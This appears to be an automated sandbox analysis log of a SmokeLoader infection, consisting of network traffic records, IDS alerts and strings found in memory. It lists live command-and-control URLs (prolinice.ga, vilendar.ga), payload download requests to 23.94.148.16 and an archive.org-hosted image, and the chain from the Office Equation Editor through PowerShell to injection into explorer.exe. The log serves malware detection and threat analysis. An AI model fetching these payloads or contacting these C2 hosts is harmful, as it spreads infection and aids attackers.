            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443
            Source: global trafficTCP traffic: 207.241.232.154:443 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 207.241.232.154:443

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.22:49167 -> 185.251.91.119:80
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.22:49166 -> 185.251.91.119:80
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.22:49168 -> 185.251.91.119:80
            Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 207.241.232.154:443 -> 192.168.2.22:49164
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 185.251.91.119 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: prolinice.ga
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: http://prolinice.ga/index.php
            Source: Malware configuration extractorURLs: http://vilendar.ga/index.php
            Source: global trafficHTTP traffic detected: GET /27/items/vbs_20240726_20240726/vbs.jpg HTTP/1.1Host: ia803104.us.archive.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /90/WEFV.txt HTTP/1.1Host: 23.94.148.16Connection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 207.241.232.154 207.241.232.154
            Source: Joe Sandbox ViewASN Name: INTERNET-ARCHIVEUS INTERNET-ARCHIVEUS
            Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
            Source: Joe Sandbox ViewASN Name: SPRINTHOSTRU SPRINTHOSTRU
            Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
            Source: Network trafficSuricata IDS: 2829848 - Severity 2 - ETPRO MALWARE SmokeLoader encrypted module (3) : 185.251.91.119:80 -> 192.168.2.22:49166
            Source: global trafficHTTP traffic detected: GET /90/verynicebuttersmoothcakeicream.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.94.148.16Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cpbrvhywlnsy.com/User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 275Host: prolinice.ga
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://prolinice.ga/User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 1395Host: prolinice.ga
            Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wehtwifahcxeheu.com/User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: prolinice.ga
            Source: unknownHTTPS traffic detected: 207.241.232.154:443 -> 192.168.2.22:49164 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 207.241.232.154:443 -> 192.168.2.22:49164 version: TLS 1.0
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: unknownTCP traffic detected without corresponding DNS query: 23.94.148.16
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{FBE20470-930D-4657-894E-45CE94F633FB}.tmpJump to behavior
            Source: global trafficHTTP traffic detected: GET /27/items/vbs_20240726_20240726/vbs.jpg HTTP/1.1Host: ia803104.us.archive.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /90/verynicebuttersmoothcakeicream.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.94.148.16Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /90/WEFV.txt HTTP/1.1Host: 23.94.148.16Connection: Keep-Alive
            Source: powershell.exe, 00000007.00000002.366421069.0000000004F03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
            Source: global trafficDNS traffic detected: DNS query: ia803104.us.archive.org
            Source: global trafficDNS traffic detected: DNS query: prolinice.ga
            Source: unknownHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cpbrvhywlnsy.com/User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 275Host: prolinice.ga
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Sat, 31 Aug 2024 17:25:32 GMTserver: Apache/2.4.59 (Debian)transfer-encoding: chunkedcontent-type: text/html; charset=utf-8Data Raw: 33 37 44 33 0d 0a 18 00 00 00 a0 5f e8 0a 27 e8 c8 da 8d 2a 7f ba 53 e4 29 1d ec 5d a3 3f 18 cd 8f ba 00 ca 2c 05 00 7c e1 f7 57 09 03 02 00 09 00 9e 03 00 00 53 1f 7d 22 77 32 62 71 76 3f 4f 55 52 12 42 00 c9 32 ee 68 fe 0f ca 76 74 07 d6 d6 f9 b8 92 29 e8 55 92 92 3e c8 50 dd 24 a4 99 ce 5c 90 b9 3b fc 51 49 c0 0d f0 19 d3 e9 92 2a 7a f7 09 00 bb 7a b8 01 84 b7 a3 64 8b 0b f3 9f 79 57 fa 26 ce 46 fb 76 8c c7 a7 e0 22 d1 2d c9 1e 43 c3 ef c1 4c dd a0 af 3d b8 a8 a5 fb c0 70 8e 98 0e df 4b cc 40 42 f2 70 5e a2 6b 51 b2 9f 66 73 fe c7 15 ac cd f6 9d 88 6a 44 07 1e 8d 8b 6b 24 18 2b 4b 2a ec 81 b7 50 50 a4 4e ad cf 32 5c c0 15 b4 57 90 1b 0d ee 6c f7 54 23 c9 ed 8e bc 36 a0 b4 7a c0 a1 84 b8 ba d4 a3 62 52 1c ae d9 4b 5a 18 a9 1c db 20 3a d0 44 3f 55 06 6b bf 4b 63 27 f1 ac 4f fe d1 04 8b 3f ba 91 69 f9 fb 81 fe 97 af cd a6 40 69 e9 33 b2 a6 45 cc f6 83 0e 7c 20 5b 7d 1d a4 53 32 fe 9d cc 54 71 e4 4c 20 4c b2 37 b3 8e 0f 1b d8 40 78 f3 c6 c7 84 1a aa 21 d4 fa 17 f2 46 ab 2a 9b db a1 fa 45 c5 f8 a8 f5 78 d7 7b c7 34 f8 40 a6 ce 9e 68 07 d1 3b db 70 67 ae de de 5f 1b 81 d3 b1 e8 be 06 9b bd 51 aa 40 d1 5b 4e 04 32 d7 97 2a e0 96 cc f3 08 be 06 f4 ef f1 48 d0 25 d9 73 3b 22 c7 0f b5 72 bf c3 e5 81 32 31 c9 f4 a1 4c ee 90 56 05 52 a9 1c 76 6f 99 dc ff 39 62 09 4e 0e 7c a8 50 2c 99 64 73 2c f8 8e 19 ec 5e 4c 2b 1b 6a 20 6d e3 2e 26 3e f2 ee 67 21 84 c5 3d 2f 72 90 3a ea 6c 5f b3 01 1d 55 2a 97 6b 1b 48 d7 18 d0 92 ef 20 3e 28 8e b6 b7 0f 4f c2 e3 41 ee a3 e2 e5 4f 7c 04 cf 84 8c 71 e5 91 3b ef 9c 40 2b b4 81 b3 6f 0c e5 ea f4 a9 02 25 53 be 6e 6e 71 ce db f8 20 6e 55 5b a4 66 26 ed 43 1b d2 35 1a 47 54 5d 20 0c 1b 03 8a 54 94 fb f1 d9 5d 91 01 a9 f6 90 b3 3e c6 10 cc 67 ca 7b 76 0b 97 06 5b d8 d2 e2 0f 79 af ed 1b 53 92 e1 e9 cc 7a b6 b9 98 42 38 a5 00 49 58 88 86 83 3c a1 5c d3 72 7d ad bc 8d 80 b4 ea 85 32 d9 b9 33 ce ae d5 90 f4 bb 3a c9 3d 3b 48 a7 e3 58 dd be d0 8a aa 01 3e 48 f4 19 2b 95 d5 65 ff b4 78 a1 d2 cd 69 0a 91 f7 6a 18 3d 4f 75 b1 bc 1b b1 60 c8 27 8c 70 db 33 0d a6 f2 ed 80 8d aa 7c 4a 8c 59 8c 3d 99 a9 52 09 0f d9 5e 58 eb 6f 11 c9 5b 23 0e a9 04 11 b7 a5 6b eb 6e 85 01 89 5e cf 54 06 96 02 2d c3 92 6c 61 40 ee 39 ff fa 3e 0d c6 24 8f 1c 02 ac 7a ab 13 d0 be a8 cb 90 7c 6b d5 fb ae 58 ee db 76 10 36 cb d3 c0 5d 0e e0 08 4f 38 94 52 92 70 bf 7c bd c4 0d 6f f9 74 7a 41 a6 59 ea 90 d6 8f 1b 32 75 08 c5 9a 2d a0 6a 8b fd 6b c4 c2 37 35 48 bd 8c 96 77 e4 62 45 8d 49 72 d0 11 c5 42 47 60 cf 79 cc d5 44 76 86 c6 57 e5 fc f1 b9 98 00 52 87 30 6d b6 64 39 d2 05 09 e3 9f 97 c0 b2 ad 6e c6 de 2f e7 0e 6f d3 63 06 8f 24 00 37 f9 3b 90 9e fb 4b 43 08 3f 69 cf 54 36 03 b2 63 54 a5 44 81 f8 93 a5 ad 2f f5 7f 9b ad 6d 23 d8 52 1c 7c d0 7e ed e5 00 cd 59 0c 72 ff c8 4d 8a 9f 4d 22 6a 89 67 05 b3 b9 2f fa 37 ad b4 05 f0 4c 9c d2 83 fb c8 40 2b ca 87 d7 d8 99 59 38 07 be e8 b3 e1 23 2a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Sat, 31 Aug 2024 17:25:40 GMTserver: Apache/2.4.59 (Debian)content-length: 409content-type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 39 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 70 72 6f 6c 69 6e 69 63 65 2e 67 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.59 (Debian) Server at prolinice.ga Port 80</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Sat, 31 Aug 2024 17:26:53 GMTserver: Apache/2.4.59 (Debian)content-length: 7content-type: text/html; charset=utf-8Data Raw: 03 00 00 00 a0 5f e8 Data Ascii: _
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Sat, 31 Aug 2024 17:26:53 GMTserver: Apache/2.4.59 (Debian)content-length: 7content-type: text/html; charset=utf-8Data Raw: 03 00 00 00 a0 5f e8 Data Ascii: _
            Source: explorer.exe, 0000000C.00000002.630809600.00000000078EA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: Http://prolinice.ga/index.phpBB74
            Source: powershell.exe, 00000007.00000002.363808831.0000000002749000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.94.148.16
            Source: powershell.exe, 00000007.00000002.363808831.0000000002749000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.94.148.16/90/WEFV.txt
            Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000001.00000002.348951439.0000000000534000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000001.00000002.348951439.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.94.148.16/90/verynicebuttersmoothcakeicream.tIF
            Source: EQNEDT32.EXE, 00000001.00000002.348951439.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.94.148.16/90/verynicebuttersmoothcakeicream.tIFj
            Source: powershell.exe, 00000007.00000002.366421069.0000000004F03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: powershell.exe, 00000007.00000002.366421069.0000000004F03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
            Source: powershell.exe, 00000007.00000002.366421069.0000000004F03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
            Source: powershell.exe, 00000007.00000002.366421069.0000000004F03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
            Source: powershell.exe, 00000007.00000002.366421069.0000000004F03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: powershell.exe, 00000007.00000002.366421069.0000000004F03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
            Source: powershell.exe, 00000007.00000002.366421069.0000000004F03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
            Source: powershell.exe, 00000007.00000002.363633576.00000000005BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.c
            Source: explorer.exe, 0000000C.00000002.628664936.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.374687564.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com
            Source: powershell.exe, 00000007.00000002.365103207.0000000003519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000007.00000002.366421069.0000000004F03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
            Source: powershell.exe, 00000007.00000002.366421069.0000000004F03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
            Source: powershell.exe, 00000007.00000002.366421069.0000000004F03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
            Source: powershell.exe, 00000007.00000002.366421069.0000000004F03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
            Source: powershell.exe, 00000007.00000002.366421069.0000000004F03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
            Source: powershell.exe, 00000007.00000002.366421069.0000000004F03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
            Source: powershell.exe, 00000007.00000002.366421069.0000000004F03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
            Source: explorer.exe, 00000013.00000002.432154791.00000000003DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/
            Source: explorer.exe, 00000013.00000002.432154791.00000000003DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.0
            Source: explorer.exe, 00000013.00000002.432154791.0000000000394000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.419574794.000000000028E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.421675719.0000000000404000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.628871617.0000000000744000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.628530287.000000000028E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.628826534.00000000003C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000002.628600513.000000000033E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.628599452.0000000000444000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.628577670.00000000003DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/index.php
            Source: explorer.exe, 00000013.00000002.432154791.0000000000394000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.419574794.000000000028E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.421675719.0000000000404000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.628871617.0000000000744000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.628530287.000000000028E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.628826534.00000000003C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000002.628600513.000000000033E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.628599452.0000000000444000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.628577670.00000000003DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/index.phpMozilla/5.0
            Source: explorer.exe, 00000013.00000002.432154791.00000000003D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/ndex.php
            Source: powershell.exe, 00000005.00000002.368085766.00000000029D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.363808831.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: explorer.exe, 0000000C.00000002.630809600.00000000078EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.630243639.0000000003DB1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://wehtwifahcxeheu.com/
            Source: explorer.exe, 0000000C.00000002.630243639.0000000003DB1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://wehtwifahcxeheu.com/application/x-www-form-urlencodedMozilla/5.0
            Source: explorer.exe, 0000000C.00000002.628664936.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.374687564.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
            Source: powershell.exe, 00000007.00000002.366421069.0000000004F03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
            Source: powershell.exe, 00000007.00000002.366421069.0000000004F03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
            Source: explorer.exe, 0000000C.00000000.375066007.0000000003E98000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.630243639.0000000003E98000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.630243639.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.375317134.0000000007967000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.629766627.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.375066007.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.374893412.000000000260E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
